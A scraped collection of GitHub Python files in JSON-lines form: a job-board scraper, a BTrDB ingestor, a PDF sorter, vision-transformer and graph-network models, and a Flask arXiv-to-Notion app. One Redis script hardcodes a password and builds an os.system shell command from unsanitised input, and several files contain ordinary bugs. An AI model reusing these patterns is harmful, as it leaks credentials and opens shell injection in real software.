last_num:\n\n\t\t\tdriver.get('http://job.postech.ac.kr/index.php/sample-page/?pageid=1&mod=list&category1=%EC%B1%84%EC%9A%A9%EA%B3%B5%EA%B3%A0')\n\t\t\t\n\t\t\tdriver.find_element_by_xpath('//*[@id=\"kboard-default-list\"]/div[4]/table/tbody/tr['+str(int(recent_num)-last_num)+']/td[2]/a/div').click()\n\n\t\t\tlast_num=last_num+1\n\t\t\t\n\t\t\ttitle = driver.find_element_by_xpath('//*[@id=\"kboard-default-document\"]/div[1]/div[1]/h1').text\n\t\t\tcontents = driver.find_element_by_xpath('//*[@id=\"kboard-default-document\"]/div[1]/div[3]/div').text\n\t\t\t\n\t\t\tprint(title)\n\t\t\tprint(contents)\n\n\n\t\t\ttry:\n\t\t\t\timg = driver.find_element_by_xpath('//*[@id=\"kboard-default-document\"]/div[1]/div[3]/div/img').get_attribute('src')\n\t\n\t\t\t\tprint(\"img: \"+img)\n\n\t\t\texcept:\n\t\t\t\tprint(\"\")\n\n\n\t\t\ttry:\n\t\t\t\turl = driver.find_element_by_xpath('//*[@id=\"kboard-default-document\"]/div[1]/div[5]/button').get_attribute('onclick')\n\t\n\t\t\t\tprint(\"url: \"+url[22:-1])\n\n\t\t\texcept:\n\t\t\t\tprint(\"\")\n\n\t\telse:\n\t\t\tbreak\n\n\tsleep(100)\n\n\n\n\n","repo_name":"jjayd/team1","sub_path":"jobpost.py","file_name":"jobpost.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2087013676","text":"#!/usr/bin/env python\n# -*- encoding:utf-8 -*-\n\nimport os\nimport sys\n\nif __name__ == '__main__':\n with open(sys.argv[1], 'r') as f:\n lines = f.readlines()\n for line in lines:\n os.system('redis-cli -a kNlTR2nPrv lpush more_reviews ' + line + '/') \n","repo_name":"snjoer/Douban_Crawler","sub_path":"douban_movie/movie_crawler/review_links/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"5152903448","text":"\n##########################################################################\n## Imports\n##########################################################################\n\nimport uuid\nimport btrdb\nimport warnings\nfrom tqdm import tqdm\nfrom btrdb.utils.timez import to_nanoseconds\n\nfrom pgimport.parse import StreamData\n\n##########################################################################\n## Module Variables and Constants\n##########################################################################\n\nINSERT_CHUNK_SIZE = 50000\nMERGE_POLICIES = [\"never\", \"retain\", \"replace\", \"equal\"]\n\n##########################################################################\n## 
Warnings\n##########################################################################\n\nclass NullValuesWarning(UserWarning):\n \"\"\"\n Alerts users that null values were detected in data to be inserted\n and data will be dropped, as BTrDB cannot accept null values\n \"\"\"\n pass\n\nclass ProgressBarWarning(UserWarning):\n \"\"\"\n Alerts users that a progress bar will not be displayed because total\n points was not provided\n \"\"\"\n pass\n\n##########################################################################\n## DataIngestor\n##########################################################################\n\nclass DataIngestor(object):\n \"\"\"\n Parameters\n ----------\n conn: btrdb.Connection\n merge_policy: str\n merge policy to use when inserting BTrDB points\n total_points: int\n specifies total number of points to be inserted. Used to create a progess bar.\n \"\"\"\n def __init__(self, conn, merge_policy=\"never\", total_points=None):\n self.conn = conn\n\n if total_points is None:\n warnings.warn(\"total points not provided. Progress bar will not be displayed\", ProgressBarWarning)\n self.pbar = None\n else:\n self.pbar = tqdm(total=total_points)\n \n if merge_policy in MERGE_POLICIES:\n self.merge_policy = merge_policy\n else:\n raise Exception(f\"'{merge_policy}' is not a valid merge policy. Options are: {', '.join(MERGE_POLICIES)}\")\n \n @staticmethod\n def _chunk_points(stream, times, values, chunk_size):\n \"\"\"\n Parameters\n ----------\n stream: btrdb Stream\n times: pd.Series of timestamps, which can be datetime, datetime64, float, str (RFC 2822)\n values: pd.Series of float values\n chunk_size: int\n specifies number of (time, value) pairs to insert at a time\n \"\"\"\n # drop any null values\n null_positions = values[values.isnull()].index.tolist()\n if len(null_positions) > 0:\n warnings.warn(\n f\"\"\"{len(null_positions)} null values were detected in source data\n and will not be inserted into BTrDB stream {str(stream.uuid)}.\"\"\", NullValuesWarning\n )\n values.drop(null_positions, inplace=True)\n times.drop(null_positions, inplace=True)\n\n points = [(to_nanoseconds(t), v) for t, v in zip(times, values)]\n for i in range(0, len(points), chunk_size):\n yield points[i:i + chunk_size]\n \n # NOTE: I moved this into a separate func to make it easier to test\n def _ingest(self, stream, points):\n \"\"\"\n Parameters\n ----------\n stream: btrdb Stream\n points: list of (time, value) tuples\n \"\"\"\n stream.insert(points, self.merge_policy)\n \n # NOTE: Ideally this function would listen to a queue and would pick up StreamData\n # objects from the DataParser and insert as they are produced\n def ingest(self, streamdata, chunk_size=None):\n \"\"\"\n Parameters\n ----------\n streamdata: StreamData\n chunk_size: int\n specifies number of (time, value) pairs to insert at a time\n \"\"\"\n if not isinstance(streamdata, StreamData):\n raise TypeError(f\"StreamData object expected. 
Received {type(streamdata)}\")\n\n # check if stream exists already, create it if it doesn't\n meta = streamdata.metadata\n streams = self.conn.streams_in_collection(meta.collection, is_collection_prefix=False, tags=meta.tags)\n\n if len(streams) == 0:\n stream = self.conn.create(uuid.uuid4(), meta.collection, meta.tags, meta.annotations)\n else:\n stream = streams[0]\n \n # convert time and value arrays into list of tuples and split into chunks for insertion\n chunk_size = chunk_size or INSERT_CHUNK_SIZE\n for points in self._chunk_points(stream, streamdata.times, streamdata.values, chunk_size):\n self._ingest(stream, points)\n if self.pbar:\n self.pbar.update(len(points))","repo_name":"PingThingsIO/pgimport","sub_path":"pgimport/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18337650685","text":"import os\nimport shutil\nfrom unidecode import unidecode as semAcento\n\n\ndef check_dir_fonte(d = None):\n\tif not d:\n\t\tprint('Nenhum caminho digitado.')\n\t\texit()\n\t\t#os.chdir('.')\n\telse:\n\t\ttry:\n\t\t\tos.chdir(d)\n\t\texcept:\n\t\t\tprint('Caminho especificado nao encontrado.')\t\n\t\t\n\t\t\ndef list_dir(src):\n\tvar = os.listdir(src)\n\t#print('\\n'.join(var))\n\t\n\tlista = []\n\t#print(f'Conteudo deste diretório:::: ***{os.getcwd()}***\\n\\n\\nLISTAGEM:\\n\\n')\n\t\n\ti = 0\n\tfor arquivo in var:\n\t\tif arquivo.endswith('.pdf'):\n\t\t\tif i < 10:\n\t\t\t\tprint(f'-0{i} {arquivo}')\n\t\t\t\ti+=1\n\t\t\t\tlista.append(arquivo)\n\t\t\telse:\n\t\t\t\tprint(f'-{i} {arquivo}')\n\t\t\t\ti+=1\n\t\t\t\tlista.append(arquivo)\n\t\t\t\t\t\n\t\t\t\n\t\telse:\n\t\t\tif i < 10:\n\t\t\t\tprint(f'-0{i} {arquivo.upper()}' + '(DIR)'.rjust(50 - len(arquivo)) )\n\t\t\t\ti+=1\n\t\t\telse:\n\t\t\t\tprint(f'-{i} {arquivo.upper()}' + '(DIR)'.rjust(50 - len(arquivo)) )\n\t\t\t\ti+=1\t\n\tprint(f\"\\n**Total de arquivos pdf's : {i-1} arquivos\")\n\treturn lista\n\ndef pasta2_pasta_by_termo(pasta_origem = None , pasta_destino = None , termo = None):\n\t\n\t\t\n\tcheck_dir_fonte(pasta_origem)\n\tlista_pdf = list_dir()\n\t\n\tif not os.path.exists(pasta_destino):\n\t\tos.mkdir(pasta_destino)\n\tfor root , dirs , files in os.walk('.'):\n\t\n\t\tif os.getcwd() == pasta_origem:\n\t\t\t\t\t\n\t\t\tfor file in files:\n\t\t\t\tif file.endswith('.pdf'):\n\t\t\t\t\tif termo in semAcento(file).lower():\n\t\t\t\t\t\t\n\t\t\t\t\t\torigem = os.path.join(root,file)\n\t\t\t\t\t\tdestino = os.path.join(f'{pasta_destino}',file)\n\t\t\t\t\t\t\n\t\t\t\t\t\t \n\t\t\t\t\t\t\n\t\t\t\t\t\tshutil.move(origem , destino)\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\tprint('Done !')\t\t\n\t\t\t\n\t\t\n\t\t\n\t\n\t\n\t\n\t\t\n\n\n\t\t\n\nsrc = input('Check Pasta Origem: ')\nwhile True:\n\ttry:\n\t\tlist_dir(src)\t\n\t\tdest = input('Check Pasta Destino: ')\n\t\tterm = input('Check Termo: ')\n\t\tpasta2_pasta_by_termo(src,dest, semAcento(term).lower())\n\texcept:\n\t\tprint('Caminho nao encontrado.')\n\t\tbreak\n","repo_name":"maraes/Microtools","sub_path":"Puts Past v2.py","file_name":"Puts Past v2.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71063254567","text":"from functools import partial\nfrom collections import OrderedDict\nimport torch\nimport torch.nn as nn\nfrom model.base_network import 
BaseNetwork\nimport config as cfg\nfrom model.onepic_cnn_pool import SoftPoolingGcnEncoder\nimport os\n\nimport time\n\n\ndef drop_path(x, drop_prob: float = 0., training: bool = False):\n if drop_prob == 0. or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets\n random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)\n random_tensor.floor_() # binarize\n output = x.div(keep_prob) * random_tensor\n return output\n\n\nclass DropPath(nn.Module):\n def __init__(self, drop_prob=None):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n\n def forward(self, x):\n return drop_path(x, self.drop_prob, self.training)\n\n\nclass PatchEmbed(nn.Module):\n\n def __init__(self, img_size=224, patch_size=16, in_c=3, embed_dim=768, norm_layer=None):\n super().__init__()\n img_size = (img_size, img_size)\n patch_size = (patch_size, patch_size)\n self.img_size = img_size\n self.patch_size = patch_size\n self.grid_size = (img_size[0] // patch_size[0], img_size[1] // patch_size[1])\n self.num_patches = self.grid_size[0] * self.grid_size[1]\n\n self.proj = nn.Conv2d(in_c, embed_dim, kernel_size=patch_size, stride=patch_size)\n self.norm = norm_layer(embed_dim) if norm_layer else nn.Identity()\n\n def forward(self, x):\n B, C, H, W = x.shape\n assert H == self.img_size[0] and W == self.img_size[1], \\\n f\"Input image size ({H}*{W}) doesn't match model ({self.img_size[0]}*{self.img_size[1]}).\"\n x = self.proj(x).flatten(2).transpose(1, 2)\n x = self.norm(x)\n return x\n\n\nclass Attention(nn.Module):\n def __init__(self,\n dim, # 输入token的dim\n num_heads=8,\n qkv_bias=False,\n qk_scale=None,\n attn_drop_ratio=0.,\n proj_drop_ratio=0.):\n super(Attention, self).__init__()\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop_ratio)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop_ratio)\n\n def forward(self, x):\n B, N, C = x.shape\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n q, k, v = qkv[0], qkv[1], qkv[2]\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n\nclass Mlp(nn.Module):\n\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass Block(nn.Module):\n def __init__(self,\n dim,\n num_heads,\n mlp_ratio=4.,\n qkv_bias=False,\n qk_scale=None,\n drop_ratio=0.,\n attn_drop_ratio=0.,\n drop_path_ratio=0.,\n act_layer=nn.GELU,\n norm_layer=nn.LayerNorm):\n super(Block, self).__init__()\n self.norm1 = norm_layer(dim)\n self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale,\n attn_drop_ratio=attn_drop_ratio, proj_drop_ratio=drop_ratio)\n # NOTE: drop path for stochastic depth, we shall see if this is better than 
dropout here\n self.drop_path = DropPath(drop_path_ratio) if drop_path_ratio > 0. else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop_ratio)\n\n def forward(self, x):\n x = x + self.drop_path(self.attn(self.norm1(x)))\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\n\nclass VisionTransformer(BaseNetwork):\n def __init__(self, img_size=224, patch_size=16, in_c=3, num_classes=1000,\n embed_dim=768, depth=12, num_heads=12, mlp_ratio=4.0, qkv_bias=True,\n qk_scale=None, representation_size=None, distilled=False, drop_ratio=0.,\n attn_drop_ratio=0., drop_path_ratio=0., embed_layer=PatchEmbed, norm_layer=None,\n act_layer=None):\n\n super(VisionTransformer, self).__init__()\n self.num_classes = num_classes\n self.num_features = self.embed_dim = embed_dim # num_features for consistency with other models\n self.num_tokens = 1 # 2 if distilled else 1\n norm_layer = norm_layer or partial(nn.LayerNorm, eps=1e-6)\n act_layer = act_layer or nn.GELU\n self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))\n self.patch_embed = embed_layer(img_size=img_size, patch_size=patch_size, in_c=in_c, embed_dim=embed_dim)\n num_patches = self.patch_embed.num_patches\n self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + self.num_tokens, embed_dim))\n self.pos_drop = nn.Dropout(p=drop_ratio)\n\n dpr = [x.item() for x in torch.linspace(0, drop_path_ratio, depth)] # stochastic depth decay rule\n self.blocks = nn.Sequential(*[\n Block(dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,\n drop_ratio=drop_ratio, attn_drop_ratio=attn_drop_ratio, drop_path_ratio=dpr[i],\n norm_layer=norm_layer, act_layer=act_layer)\n for i in range(depth)\n ])\n self.norm = norm_layer(embed_dim)\n\n # Representation layer\n if representation_size and not distilled:\n self.has_logits = True\n self.num_features = representation_size\n self.pre_logits = nn.Sequential(OrderedDict([\n (\"fc\", nn.Linear(embed_dim, representation_size)),\n (\"act\", nn.Tanh())\n ]))\n else:\n self.has_logits = False\n self.pre_logits = nn.Identity()\n\n # Classifier head(s)\n self.head_dist = None\n if distilled:\n self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()\n\n def forward_features(self, x):\n x = self.patch_embed(x) # [B, 196, 768]\n cls_token = self.cls_token.expand(x.shape[0], -1, -1)\n x = torch.cat((cls_token, x), dim=1) # [B, 197, 768]\n x = self.pos_drop(x + self.pos_embed)\n x = self.blocks(x)\n x = self.norm(x)\n return x\n\n def forward(self, x):\n x = self.forward_features(x)\n return x\n\n\ndef vit_base_patch16_224():\n \"\"\"\n 链接: https://pan.baidu.com/s/1zqb08naP0RPqqfSXfkB2EA 密码: eu9f\n \"\"\"\n model = VisionTransformer(img_size=224,\n patch_size=16,\n embed_dim=768,\n depth=12,\n num_heads=12,\n representation_size=None,\n num_classes=0)\n return model\n\n\ndef vit_path_id(node_list, w, h):\n patch = 16\n img_id_array_list = []\n for node in node_list:\n id_list = []\n x1 = node[0]\n y1 = node[1]\n x2 = node[2]\n y2 = node[3]\n new_x1 = int((x1 / w) * 224)\n new_x2 = int((x2 / w) * 224)\n new_y1 = int((y1 / h) * 224)\n new_y2 = int((y2 / h) * 224)\n x1_id = new_x1 // patch\n y1_id = new_y1 // patch\n x2_id = new_x2 // patch\n y2_id = new_y2 // patch\n for x in range(x1_id, x2_id + 1):\n for y in range(y1_id, y2_id + 1):\n node_id = (224 / patch) * y + x\n id_list.append(node_id)\n 
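# node_id indexes the (224/patch) x (224/patch) grid of ViT patches covering the resized image: id = row * (224/patch) + col\n        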
img_id_array_list.append(id_list)\n return img_id_array_list\n\n\nclass apnb_vit_pool(BaseNetwork):\n def __init__(self):\n super(apnb_vit_pool, self).__init__()\n self.vit = vit_base_patch16_224()\n self.GCN = SoftPoolingGcnEncoder(input_dim=768, hidden_dim=512, embedding_dim=512,\n assign_hidden_dim=512, class_num=cfg.class_num)\n self.vit.init_weights()\n self.GCN.init_weights()\n self.vit_load_weights()\n\n def vit_load_weights(self):\n device = torch.device(\"cpu\")\n self.vit.load_state_dict(torch.load(os.path.join('checkpoints/finetun/vit.pth'), map_location=device),\n strict=False)\n print(\"checkpoints/finetun/vit.pth记载完成\")\n\n def get_batch_node_feature(self, B, size, boxes, vit_features):\n # 全部batch的节点特征\n all_batch_node_feature_list = []\n for b in range(B):\n h, w = size[b]\n node_list = boxes[b]\n path_id_list = vit_path_id(node_list, w, h)\n # 当前节点的特征\n now_batch_node_feature_list = []\n for patch in path_id_list[:-1]:\n # 一个节点的特征\n one_node_feature_list = []\n for id in patch:\n id = int(id)\n # 一个patch的特征\n tmp_feature = vit_features[b:b + 1, id + 1:id + 2, :]\n one_node_feature_list.append(tmp_feature)\n one_node_feature = torch.cat(one_node_feature_list, dim=1)\n # 求均值\n one_node_feature = torch.mean(one_node_feature, dim=1).unsqueeze(1)\n # 保存到当前batch中\n now_batch_node_feature_list.append(one_node_feature)\n # 全图特征\n now_batch_node_feature_list.append(torch.mean(vit_features[b:b + 1, :, :], dim=1).unsqueeze(1))\n # 得到当前batch的节点特征\n now_batch_node_feature = torch.cat(now_batch_node_feature_list, dim=1)\n # 保存到所有batch中\n all_batch_node_feature_list.append(now_batch_node_feature)\n all_batch_node_feature = torch.cat(all_batch_node_feature_list, dim=0)\n return all_batch_node_feature\n\n def forward(self, images, size, boxes, adj):\n vit_features = self.vit(images)\n batch_node_features = self.get_batch_node_feature(images.shape[0], size, boxes, vit_features)\n out_dict = self.GCN(batch_node_features, adj)\n return out_dict\n","repo_name":"Larry-zx/Artistic-analysis","sub_path":"model/apnb_vit_pool.py","file_name":"apnb_vit_pool.py","file_ext":"py","file_size_in_byte":11145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72197224169","text":"from beam_pipeline import SpacySentenceSpan, SpacySpan, SpacyToken\nimport pytest\n\n\n@pytest.fixture\ndef nlp(scope='module'):\n import spacy\n from benepar.spacy_plugin import BeneparComponent\n nlp = spacy.load('en_core_web_sm')\n nlp.add_pipe(BeneparComponent('benepar_en'))\n return nlp\n\n\ndef test_parse(nlp):\n doc = nlp(u'The cat sat on the mat by a hat.')\n sent = next(doc.sents)\n psent = SpacySentenceSpan(sent)\n for child in psent._.children:\n assert isinstance(child, SpacySpan)\n s = [(sent, psent)]\n while s:\n span, pspan = s.pop()\n print('<', span.text)\n print('>', pspan.text)\n assert isinstance(pspan, SpacySpan)\n assert len(span) == len(pspan)\n assert span.text_with_ws == pspan.text_with_ws\n assert span.text == pspan.text\n if len(span) == 1:\n assert isinstance(pspan[0], SpacyToken)\n assert span[0].lemma_ == pspan[0].lemma_\n assert span[0].dep_ == pspan[0].dep_\n assert span[0].whitespace_ == pspan[0].whitespace_\n s.extend(reversed(list(zip(span._.children, pspan._.children))))\n","repo_name":"expz/past2present","sub_path":"dataflow/test/test_beam_pipeline.py","file_name":"test_beam_pipeline.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} 
+{"seq_id":"21647706343","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math # used by attention() below\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nimport numpy as np\n\nfrom layers import *\n\n\nclass GAT(nn.Module):\n def __init__(self, n_units, n_heads, dropout, attn_dropout, instance_normalization, diag):\n super(GAT, self).__init__()\n self.num_layer = len(n_units) - 1\n self.dropout = dropout\n self.inst_norm = instance_normalization\n if self.inst_norm:\n self.norm = nn.InstanceNorm1d(n_units[0], momentum=0.0, affine=True)\n self.layer_stack = nn.ModuleList()\n self.diag = diag\n for i in range(self.num_layer):\n f_in = n_units[i] * n_heads[i - 1] if i else n_units[i]\n self.layer_stack.append(MultiHeadGraphAttention(n_heads[i], f_in, n_units[i + 1], attn_dropout, diag, nn.init.ones_, False))\n\n def forward(self, x, adj):\n if self.inst_norm:\n x = self.norm(x)\n for i, gat_layer in enumerate(self.layer_stack):\n if i + 1 < self.num_layer:\n x = F.dropout(x, self.dropout, training=self.training)\n x = gat_layer(x, adj)\n if self.diag:\n x = x.mean(dim=0)\n if i + 1 < self.num_layer:\n if self.diag:\n x = F.elu(x)\n else:\n x = F.elu(x.transpose(0, 1).contiguous().view(adj.size(0), -1))\n if not self.diag:\n x = x.mean(dim=0)\n\n return x\n\n\"\"\" vanilla GCN \"\"\"\n\n\n\nclass GCN(nn.Module):\n def __init__(self, nfeat, nhid, nout, dropout):\n super(GCN, self).__init__()\n\n self.gc1 = GraphConvolution(nfeat, nhid)\n self.gc2 = GraphConvolution(nhid, nout)\n self.dropout = dropout\n\n def forward(self, x, adj):\n x = F.relu(self.gc1(x, adj)) # change to leaky relu\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc2(x, adj)\n return x\n\n\n\n\"\"\" loss \"\"\"\n\ndef cosine_sim(im, s):\n \"\"\"Cosine similarity between all the image and sentence pairs\n \"\"\"\n return im.mm(s.t())\n\n\ndef l2norm(X):\n \"\"\"L2-normalize columns of X\n \"\"\" \n norm = torch.pow(X, 2).sum(dim=1, keepdim=True).sqrt()\n a = norm.expand_as(X) + 1e-8\n X = torch.div(X, a) \n return X\n\nclass NCA_loss(nn.Module):\n\n def __init__(self, alpha, beta, ep):\n super(NCA_loss, self).__init__()\n self.alpha = alpha\n self.beta = beta\n self.ep = ep\n self.sim = cosine_sim\n #from pytorch_metric_learning import losses\n #self.loss_func = losses.MultiSimilarityLoss()\n\n\n def forward(self, emb, train_links, test_links, device=0):\n \n emb = F.normalize(emb)\n num_ent = emb.shape[0]\n\n im = emb[train_links[:, 0]]\n s = emb[train_links[:,1]]\n \n #labels = torch.arange(im.size(0))\n #embeddings = torch.cat([im, s], dim=0)\n #labels = torch.cat([labels, labels], dim=0)\n #loss = self.loss_func(embeddings, labels)\n #return loss\n\n #\"\"\"\n \n if len(test_links) != 0:\n test_links = test_links[random.sample([x for x in np.arange(0,len(test_links))],4500)]\n\n im_neg_scores = self.sim(im, emb[test_links[:,1]])\n s_neg_scores = self.sim(s, emb[test_links[:,0]])\n \n #im = l2norm(im)\n #s = l2norm(s)\n \n bsize = im.size()[0]\n # compute prediction-target score matrix\n #print (im)\n #print(s)\n scores = self.sim(im, s) #+ 1\n #print (scores)\n tmp = torch.eye(bsize).cuda(device)\n s_diag = tmp * scores\n \n alpha = self.alpha\n alpha_2 = alpha # / 3.0\n beta = self.beta\n ep = self.ep\n S_ = torch.exp(alpha * (scores - ep))\n S_ = S_ - S_ * tmp # clear diagonal\n\n if len(test_links) != 0:\n S_1 = torch.exp(alpha * 
(im_neg_scores - ep))\n S_2 = torch.exp(alpha * (s_neg_scores - ep))\n\n loss_diag = - torch.log(1 + F.relu(s_diag.sum(0)))\n\n loss = torch.sum(\n torch.log(1 + S_.sum(0)) / alpha\n + torch.log(1 + S_.sum(1)) / alpha \n + loss_diag * beta \\\n ) / bsize\n if len(test_links) != 0:\n loss_global_neg = (torch.sum(torch.log(1 + S_1.sum(0)) / alpha_2\n + torch.log(1 + S_2.sum(0)) / alpha_2) \n + torch.sum(torch.log(1 + S_1.sum(1)) / alpha_2\n + torch.log(1 + S_2.sum(1)) / alpha_2)) / 4500 \n if len(test_links) != 0:\n return loss + loss_global_neg\n return loss\n #\"\"\"\n \nclass NCA_loss_cross_modal(nn.Module):\n\n def __init__(self, alpha, beta, ep):\n super(NCA_loss_cross_modal, self).__init__()\n self.alpha = alpha\n self.beta = beta\n self.ep = ep\n self.sim = cosine_sim\n\n def forward(self, emb1, emb2, train_links, device=0):\n \n emb1 = F.normalize(emb1)\n emb2 = F.normalize(emb2)\n num_ent = emb1.shape[0]\n\n im = emb1[train_links[:, 0]]\n s = emb2[train_links[:,1]]\n \n \n bsize = im.size()[0]\n # compute prediction-target score matrix\n #print (im)\n #print(s)\n scores = self.sim(im, s) #+ 1\n #print (scores)\n tmp = torch.eye(bsize).cuda(device)\n s_diag = tmp * scores\n \n alpha = self.alpha\n alpha_2 = alpha # / 3.0\n beta = self.beta\n ep = self.ep\n S_ = torch.exp(alpha * (scores - ep))\n S_ = S_ - S_ * tmp # clear diagnal\n\n loss_diag = - torch.log(1 + F.relu(s_diag.sum(0)))\n\n loss = torch.sum(\n torch.log(1 + S_.sum(0)) / alpha\n + torch.log(1 + S_.sum(1)) / alpha \n + loss_diag * beta \\\n ) / bsize\n return loss\n\nclass SelfAttention(nn.Module):\n def __init__(self, hidden_size, batch_first=False):\n super(SelfAttention, self).__init__()\n\n self.hidden_size = hidden_size\n self.batch_first = batch_first\n\n self.att_weights = nn.Parameter(torch.Tensor(1, hidden_size),\n requires_grad=True)\n\n nn.init.xavier_uniform(self.att_weights.data)\n\n def get_mask(self):\n pass\n\n def forward(self, inputs):\n\n if self.batch_first:\n batch_size, max_len = inputs.size()[:2]\n else:\n max_len, batch_size = inputs.size()[:2]\n inputs = inputs.permute(1, 0, 2)\n\n # att = torch.mul(inputs, self.att_weights.expand_as(inputs))\n # att = att.sum(-1)\n weights = torch.bmm(inputs,\n self.att_weights # (1, hidden_size)\n .permute(1, 0) # (hidden_size, 1)\n .unsqueeze(0) # (1, hidden_size, 1)\n # (batch_size, hidden_size, 1)\n .repeat(batch_size, 1, 1)\n )\n\n attentions = F.softmax(F.relu(weights.squeeze()))\n\n # apply weights\n weighted = torch.mul(\n inputs, attentions.unsqueeze(-1).expand_as(inputs))\n\n # get the final fixed vector representations of the sentences\n representations = weighted.sum(1).squeeze()\n\n return representations, attentions\n\n\ndef attention(q, k, v, d_k, mask=None, dropout=None):\n \n scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(d_k)\n \n if mask is not None:\n mask = mask.unsqueeze(1)\n scores = scores.masked_fill(mask == 0, -1e9)\n \n scores = F.softmax(scores, dim=-1)\n \n if dropout is not None:\n scores = dropout(scores)\n \n output = torch.matmul(scores, v)\n return output\n\nclass Norm(nn.Module):\n def __init__(self, d_model, eps = 1e-6):\n super().__init__()\n \n self.size = d_model\n # create two learnable parameters to calibrate normalisation\n self.alpha = nn.Parameter(torch.ones(self.size))\n self.bias = nn.Parameter(torch.zeros(self.size))\n self.eps = eps\n def forward(self, x):\n norm = self.alpha * (x - x.mean(dim=-1, keepdim=True)) \\\n / (x.std(dim=-1, keepdim=True) + self.eps) + self.bias\n return norm\n\nclass 
FeedForward(nn.Module):\n def __init__(self, d_model, d_ff=2048, dropout = 0.1):\n super().__init__() \n # We set d_ff as a default to 2048\n self.linear_1 = nn.Linear(d_model, d_ff)\n self.dropout = nn.Dropout(dropout)\n self.linear_2 = nn.Linear(d_ff, d_model)\n def forward(self, x):\n x = self.dropout(F.relu(self.linear_1(x)))\n x = self.linear_2(x)\n return x\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, heads, d_model, dropout=0.0):\n super().__init__()\n \n self.d_model = d_model\n self.d_k = d_model // heads\n #print (self.d_k) \n self.h = heads\n \n self.q_linear = nn.Linear(d_model, d_model)\n self.v_linear = nn.Linear(d_model, d_model)\n self.k_linear = nn.Linear(d_model, d_model)\n self.dropout = nn.Dropout(dropout)\n self.out = nn.Linear(d_model, d_model)\n \n def forward(self, q, k, v, mask=None):\n \n bs = q.size(0)\n \n # perform linear operation and split into h heads\n \n #print (k.shape)\n\n k = self.k_linear(k).view(bs, -1, self.h, self.d_k)\n q = self.q_linear(q).view(bs, -1, self.h, self.d_k)\n v = self.v_linear(v).view(bs, -1, self.h, self.d_k)\n \n # transpose to get dimensions bs * h * sl * d_model\n \n k = k.transpose(1,2)\n q = q.transpose(1,2)\n v = v.transpose(1,2)# calculate attention using function we will define next\n #print (k.shape)\n scores = attention(q, k, v, self.d_k, mask, self.dropout)\n \n # concatenate heads and put through final linear layer\n concat = scores.transpose(1,2).contiguous()\\\n .view(bs, -1, self.d_model)\n \n output = concat\n output = self.out(concat)\n \n return output\n","repo_name":"cambridgeltl/eva","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10286,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"31428909492","text":"from flask import Flask, jsonify, request, session, send_from_directory\nfrom flask_cors import CORS\nfrom flask_session import Session\nimport requests\nfrom datetime import timedelta\nimport os\n\nfrom utils.notion import get_access_token, get_database_data, create_page\nfrom utils.arxiv import get_paper_info, download_paper_pdf, download_paper_image\nfrom utils.chatgpt import get_summary\n\napp = Flask(__name__, static_folder='.images')\nCORS(app, supports_credentials=True)\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_USE_SIGNER\"] = True\napp.config[\"SESSION_TYPE\"] = 